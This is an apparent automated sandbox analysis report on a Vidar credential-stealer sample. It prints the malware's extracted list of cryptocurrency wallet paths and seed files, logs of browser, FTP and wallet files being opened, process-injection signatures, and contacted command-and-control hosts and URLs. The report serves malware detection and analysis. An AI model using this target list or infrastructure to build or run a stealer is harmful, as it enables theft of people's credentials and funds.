Source: kat2B07.tmp, 00000002.00000002.425312567.0000000000439000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: um-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: kat2B07.tmp, 00000002.00000002.425312567.0000000000439000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: um-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: kat2B07.tmp, 00000002.00000002.425312567.0000000000439000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: um-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: kat2B07.tmp, 00000002.00000002.425312567.0000000000439000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: um-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: kat2B07.tmp, 00000002.00000002.425497863.00000000009B1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: kat2B07.tmp, 00000002.00000002.425497863.00000000009B1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\prefs.js Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies Jump to behavior
Tries to harvest and steal ftp login credentials
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml Jump to behavior
Tries to steal Crypto Currency Wallets
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp File opened: C:\Users\user\AppData\Roaming\Exodus\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp File opened: C:\Users\user\AppData\Roaming\Exodus\backups\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp File opened: C:\Users\user\AppData\Roaming\MultiDoge\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp File opened: C:\Users\user\AppData\Roaming\Binance\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp File opened: C:\Users\user\AppData\Roaming\Ledger Live\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\ Jump to behavior
Yara detected Credential Stealer
Source: Yara match File source: Process Memory Space: kat2B07.tmp PID: 204, type: MEMORYSTR

Remote Access Functionality
barindex
Yara detected CryptOne packer
Source: Yara match File source: 00000000.00000002.342512838.0000000002EEB000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Yara detected Vidar stealer
Source: Yara match File source: 0.2.82xul16VKj.exe.3080000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.82xul16VKj.exe.3080000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.82xul16VKj.exe.2eb7719.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.82xul16VKj.exe.2eb7719.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.82xul16VKj.exe.2a0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.82xul16VKj.exe.2a0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.342253005.00000000002A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.342560030.0000000003080000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.342512838.0000000002DE0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 82xul16VKj.exe PID: 2112, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: kat2B07.tmp PID: 204, type: MEMORYSTR
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Code function: 2_2_1D745C70 sqlite3_prepare_v3,sqlite3_bind_int64,sqlite3_step,sqlite3_column_value,sqlite3_result_value,sqlite3_reset, 2_2_1D745C70
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Code function: 2_2_1D7B1FE0 sqlite3_mprintf,sqlite3_bind_int64,sqlite3_step,sqlite3_reset, 2_2_1D7B1FE0
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Code function: 2_2_1D7ADFC0 sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_mprintf,sqlite3_bind_text,sqlite3_step,sqlite3_reset, 2_2_1D7ADFC0
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Code function: 2_2_1D85D9E0 sqlite3_bind_int64,sqlite3_log,sqlite3_log,sqlite3_log,sqlite3_bind_int64,sqlite3_log,sqlite3_log,sqlite3_log, 2_2_1D85D9E0
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Code function: 2_2_1D7D5910 sqlite3_mprintf,sqlite3_bind_int64, 2_2_1D7D5910
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Code function: 2_2_1D7ADB10 sqlite3_initialize,sqlite3_bind_int64,sqlite3_step,sqlite3_column_bytes,sqlite3_column_blob,sqlite3_reset,sqlite3_free,sqlite3_free,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_free, 2_2_1D7ADB10
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Code function: 2_2_1D7D55B0 sqlite3_bind_int64,sqlite3_step,sqlite3_reset, 2_2_1D7D55B0
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Code function: 2_2_1D8514D0 sqlite3_bind_int64,sqlite3_log,sqlite3_log,sqlite3_log, 2_2_1D8514D0
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Code function: 2_2_1D85D4F0 sqlite3_bind_value,sqlite3_log,sqlite3_log,sqlite3_log, 2_2_1D85D4F0
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Code function: 2_2_1D80D610 sqlite3_free,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_bind_int64,sqlite3_step,sqlite3_reset, 2_2_1D80D610
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Code function: 2_2_1D7D51D0 sqlite3_mprintf,sqlite3_bind_int64,sqlite3_step,sqlite3_reset, 2_2_1D7D51D0
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Code function: 2_2_1D7C9090 sqlite3_reset,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_errmsg,sqlite3_mprintf, 2_2_1D7C9090
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Code function: 2_2_1D7ED3B0 sqlite3_bind_int64,sqlite3_step,sqlite3_reset, 2_2_1D7ED3B0
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Code function: 2_2_1D814D40 sqlite3_bind_int64,sqlite3_step,sqlite3_column_int64,sqlite3_reset,sqlite3_reset,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_free, 2_2_1D814D40
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Code function: 2_2_1D768CB0 sqlite3_bind_zeroblob, 2_2_1D768CB0
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Code function: 2_2_1D760FB0 sqlite3_result_int64,sqlite3_result_double,sqlite3_result_int,sqlite3_prepare_v3,sqlite3_bind_int64,sqlite3_step,sqlite3_column_value,sqlite3_result_value,sqlite3_reset, 2_2_1D760FB0
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Code function: 2_2_1D768970 sqlite3_bind_int64,sqlite3_bind_double,sqlite3_bind_zeroblob, 2_2_1D768970
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Code function: 2_2_1D744820 sqlite3_bind_int64,sqlite3_step,sqlite3_column_int64,sqlite3_reset,sqlite3_reset,sqlite3_initialize, 2_2_1D744820
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Code function: 2_2_1D788550 sqlite3_bind_int64,sqlite3_step,sqlite3_column_int64,sqlite3_reset,sqlite3_reset, 2_2_1D788550
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Code function: 2_2_1D768430 sqlite3_bind_int64, 2_2_1D768430
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Code function: 2_2_1D7806E0 sqlite3_bind_int64,sqlite3_step,sqlite3_column_int64,sqlite3_reset, 2_2_1D7806E0
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Code function: 2_2_1D758680 sqlite3_mprintf,sqlite3_mprintf,sqlite3_initialize,sqlite3_finalize,sqlite3_free,sqlite3_mprintf,sqlite3_bind_value,sqlite3_bind_int64,sqlite3_bind_int64, 2_2_1D758680
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Code function: 2_2_1D814140 sqlite3_bind_int64,sqlite3_step,sqlite3_column_bytes,sqlite3_column_blob,sqlite3_initialize,sqlite3_reset,sqlite3_bind_int64,sqlite3_step,sqlite3_column_int64,sqlite3_reset,sqlite3_bind_int64,sqlite3_step,sqlite3_column_int64,sqlite3_reset, 2_2_1D814140
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Code function: 2_2_1D7A8200 sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,sqlite3_column_int64,sqlite3_reset,sqlite3_bind_int64,sqlite3_step,sqlite3_column_int,sqlite3_reset, 2_2_1D7A8200
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Code function: 2_2_1D767810 sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_bind_int64,sqlite3_bind_value,sqlite3_step,sqlite3_reset, 2_2_1D767810
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Code function: 2_2_1D75B400 sqlite3_mprintf,sqlite3_mprintf,sqlite3_free,sqlite3_bind_value,sqlite3_reset,sqlite3_step,sqlite3_reset,sqlite3_column_int64, 2_2_1D75B400
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Code function: 2_2_1D7F3770 sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,sqlite3_reset, 2_2_1D7F3770
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Code function: 2_2_1D8137E0 sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,sqlite3_reset, 2_2_1D8137E0
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Code function: 2_2_1D78EF30 sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_result_error_code, 2_2_1D78EF30
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Code function: 2_2_1D7AA6F0 sqlite3_mprintf,sqlite3_mprintf,sqlite3_mprintf,sqlite3_free,sqlite3_bind_value, 2_2_1D7AA6F0
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Code function: 2_2_1D7466C0 sqlite3_mprintf,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_bind_int64,sqlite3_bind_null,sqlite3_bind_blob,sqlite3_bind_value,sqlite3_free,sqlite3_bind_value,sqlite3_step,sqlite3_reset, 2_2_1D7466C0
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Code function: 2_2_1D7AE170 sqlite3_bind_int64,sqlite3_step,sqlite3_reset, 2_2_1D7AE170
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Code function: 2_2_1D79E090 sqlite3_bind_int64,sqlite3_bind_value,sqlite3_step,sqlite3_reset, 2_2_1D79E090
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp Code function: 2_2_1D79E200 sqlite3_initialize,sqlite3_free,sqlite3_bind_int64,sqlite3_bind_blob,sqlite3_step,sqlite3_reset, 2_2_1D79E200
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 1466531 Sample: 82xul16VKj.exe Startdate: 03/07/2024 Architecture: WINDOWS Score: 100 31 Multi AV Scanner detection for domain / URL 2->31 33 Found malware configuration 2->33 35 Antivirus detection for URL or domain 2->35 37 10 other signatures 2->37 8 82xul16VKj.exe 1 2->8         started        process3 file4 21 C:\Users\user\AppData\Local\...\kat2B07.tmp, PE32 8->21 dropped 39 Contains functionality to inject code into remote processes 8->39 41 Writes to foreign memory regions 8->41 43 Allocates memory in foreign processes 8->43 45 2 other signatures 8->45 12 kat2B07.tmp 1 29 8->12         started        signatures5 process6 dnsIp7 25 t.me 149.154.167.99, 443, 49161 TELEGRAMRU United Kingdom 12->25 27 tea.arpdabl.org 185.107.56.202, 49185, 80 NFORCENL Netherlands 12->27 29 4 other IPs or domains 12->29 23 C:\Users\user\AppData\Local\...\sqlt[1].dll, PE32 12->23 dropped 47 Installs new ROOT certificates 12->47 49 Found many strings related to Crypto-Wallets (likely being stolen) 12->49 51 Tries to harvest and steal ftp login credentials 12->51 53 2 other signatures 12->53 17 cmd.exe 12->17         started        file8 signatures9 process10 process11 19 timeout.exe 17->19         started       
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
185.107.56.202
 tea.arpdabl.org Netherlands
43350 NFORCENL false
116.202.180.70
 unknown Germany
24940 HETZNER-ASDE false
199.59.243.226
 survey-smiles.com United States
395082 BODIS-NJUS false
149.154.167.99
 t.me United Kingdom
62041 TELEGRAMRU true

Contacted Domains

Name IP Active
bg.microsoft.map.fastly.net 199.232.214.172 true
tea.arpdabl.org 185.107.56.202 true
edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com 217.20.58.23 true
survey-smiles.com 199.59.243.226 true
t.me 149.154.167.99 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
https://steamcommunity.com/profiles/76561199730044335 true
  • 0%, Virustotal, Browse
  • Avira URL Cloud: malware
 unknown
https://t.me/bu77un true
  • 0%, Virustotal, Browse
  • Avira URL Cloud: malware
 unknown
http://survey-smiles.com/ true
  • 8%, Virustotal, Browse
  • Avira URL Cloud: safe
 unknown
http://tea.arpdabl.org/ false
  • 2%, Virustotal, Browse
  • Avira URL Cloud: safe
 unknown